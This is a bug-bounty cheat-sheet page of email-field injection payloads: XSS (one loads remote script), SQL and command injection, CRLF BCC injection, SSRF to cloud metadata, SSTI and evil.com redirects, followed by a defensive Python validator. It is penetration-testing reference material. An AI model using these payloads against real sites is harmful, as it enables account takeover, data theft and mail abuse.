# Email injections

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

{% hint style="success" %}
*Create multiple accounts with an alias*\
\
*<email@bugcrowdninja.com>*\
*<email+1@bugcrowdninja.com>*\
*<email+2@bugcrowdninja.com>*
{% endhint %}

```
user[email][]=valid@email.com&user[email][]=attacker@email.com
```

## JSON

`{"email":"mymail@b.com"}`

Try:

```
{"email":["mymail@b.com", "attacker@x.com"]}
{"email":"mymail@b.com", "email":"attacker@x.com"}
email=attacker@x.com
```

## Punycode

Check the email registration form:

{% content-ref url="registration-form" %}
[registration-form](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/registration-form)
{% endcontent-ref %}

## Parser Abuse - Domain confusion

```
oastify.com!collab\@example.com
collab%psres.net(@example.com
```

{% embed url="https://portswigger.net/research/splitting-the-email-atom" %}

{% embed url="https://github.com/portswigger/splitting-the-email-atom" %}

## XSS

```
"><script>alert(1)</script>@test.com
"><svg/onload=alert(3)>@test.com
"><svg/onload=confirm(1337)>"@x.y
"<script src=//xsshere?"@email.com
"><Img/Src/OnError=alert(1)>"@gmail.com
"><Img/Src/OnError=import('//X55.is')>"@gmail.com
```

```
"><Svg/OnLoad=alert(1)>"@gmail.com
"><svg/onload=confirm(1)>"@x.y
```

```
test+(<script>alert(0)</script>)@example.com
attacker@gmail.com'\"<svg/onload=alert(document.cookie)>
```

XSS in an email address is underrated: email fields are rarely sanitized. Use a catch-all address on your own domain so that you can also complete account verification if it is required.

`"><img/src/onerror=import('//domain/')>"@yourdomain.com`

{% content-ref url="xss" %}
[xss](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xss)
{% endcontent-ref %}

## SSTI

```
test+${{7*7}}@example.com

test+(${{7*7}})@example.com

test-(${{7*7}})@example.com
```

## SSRF

```
test@your-burpcollaborator.net
test@requestbin.net
test@127.0.0.1
test@localhost
test@169.254.169.254
```

## CRLF

{% content-ref url="crlf-injection" %}
[crlf-injection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/crlf-injection)
{% endcontent-ref %}

{% content-ref url="password-reset" %}
[password-reset](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/password-reset)
{% endcontent-ref %}

Try these in registration or password-reset forms:

```
test@example.com%0d%0aBCC:attacker@example.com
test@example.com\r\nBCC:attacker@example.com
test@example.com%0aCC:attacker@example.com
test@example.com\r\nContent-Type:text/html\r\n\r\n<b>Injected</b>
```

```
test@example.com%0d%0aInjected-Header: injected
test@example.com%0aInjected-Header: injected
```

## SQL Injection

{% content-ref url="sql-injection" %}
[sql-injection](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/sql-injection)
{% endcontent-ref %}

```
test' OR '1'='1@example.com
test" OR "1"="1@example.com
test@example.com'--
test@example.com") OR 1=1--
```

```
"1-'or'1'='1"@email.com
```

```
john.doe+intigriti' or/**/1/**/=/**/--@example.com
```

```
johne.doe+intigriti'/**/or/**/1/**/=/**/1/**/--@example.com
```

```
test+intigiriti'/**/union/**/select/**/table_name/**/from/**/information_schema.tables--@test.test
```

{% embed url="https://book.hacktricks.xyz/pentesting-web/email-injections" %}

{% embed url="https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17" %}

## Command Injection

{% content-ref url="../../ctf/misc/command-injection" %}
[command-injection](https://0xss0rz.gitbook.io/0xss0rz/ctf/misc/command-injection)
{% endcontent-ref %}

```
test@example.com; whoami
test@example.com && id
test@example.com | uname -a
test@example.com`id`
```

## Open Redirection

```
test@example.com%0d%0aLocation:https://evil.com
test@example.com/?next=https://evil.com
```
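On the defensive side, every payload class above (parameter-pollution arrays, duplicate JSON keys, quoted-string XSS, parser comments and backslash escapes, CRLF, SSTI braces, IP-literal SSRF, SQL and shell metacharacters, open-redirect suffixes) relies on something an RFC 5322-complete parser accepts. A strict allowlist validator is added here as an example; it is not code from the original page or from any referenced project, and the `allow_idn` policy flag and all function names are assumptions.

```python
import json
import re
from urllib.parse import unquote

# Deliberately stricter than RFC 5322: no quoted local parts, no comments, no
# backslash escapes, no IP literals. An allowlist beats a denylist of tricks.
LOCAL_RE = re.compile(r"[A-Za-z0-9_+-]+(?:\.[A-Za-z0-9_+-]+)*")
DOMAIN_RE = re.compile(r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}")


def check_email(value, allow_idn=False):
    """Return (accepted, reason). allow_idn is an assumed policy knob."""
    # A list is not an email: rejects user[email][]=... and {"email":[...]}.
    if not isinstance(value, str):
        return False, "expected a single string, got " + type(value).__name__
    if len(value) > 254:
        return False, "too long"
    # Check the raw string and its percent-decoded form so %0d%0a is caught
    # even if a later layer decodes it again before building mail headers.
    for s in (value, unquote(value)):
        if any(not (0x21 <= ord(c) <= 0x7E) for c in s):
            return False, "control, whitespace or non-ASCII character"
    if value.count("@") != 1:
        return False, "exactly one @ required"
    local, domain = value.split("@")
    if len(local) > 64 or not LOCAL_RE.fullmatch(local):
        return False, "local part outside allowlist"
    if not DOMAIN_RE.fullmatch(domain):
        return False, "domain outside allowlist"
    # Punycode lookalikes (xn--) are a registration-abuse risk; off by default.
    if not allow_idn and any(l.lower().startswith("xn--") for l in domain.split(".")):
        return False, "punycode domain rejected by policy"
    return True, "ok"


def reject_duplicate_keys(pairs):
    """json.loads hook: fail on {"email":..,"email":..} instead of keeping the last."""
    obj = {}
    for key, val in pairs:
        if key in obj:
            raise ValueError("duplicate key: " + key)
        obj[key] = val
    return obj


def check_signup_body(body):
    """Parse a JSON sign-up body (constructed sample input) and validate its email."""
    try:
        data = json.loads(body, object_pairs_hook=reject_duplicate_keys)
    except ValueError as exc:  # JSONDecodeError is a ValueError subclass
        return False, str(exc)
    return check_email(data.get("email") if isinstance(data, dict) else None)
```

Syntactically valid addresses at external domains (the collaborator-style SSRF probes) still pass; deciding whether a given domain may receive mail is a separate policy check (for example an MX lookup or a denylist), not a parsing problem.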

## Bypass Access Control

{% embed url="https://portswigger.net/research/splitting-the-email-atom" %}

## HTML injection - Subscription form

{% embed url="https://medium.com/@mohamed.yasser442200/email-html-injection-with-a-simple-tip-aeab346fbefc" %}

## Resources

{% embed url="https://github.com/HackTricks-wiki/hacktricks/blob/master/pentesting-web/email-injections.md" %}

{% embed url="https://infosecwriteups.com/the-ultimate-guide-to-email-input-field-vulnerability-testing-18f96fc42251" %}


## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more.
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them.
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs, such as cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)
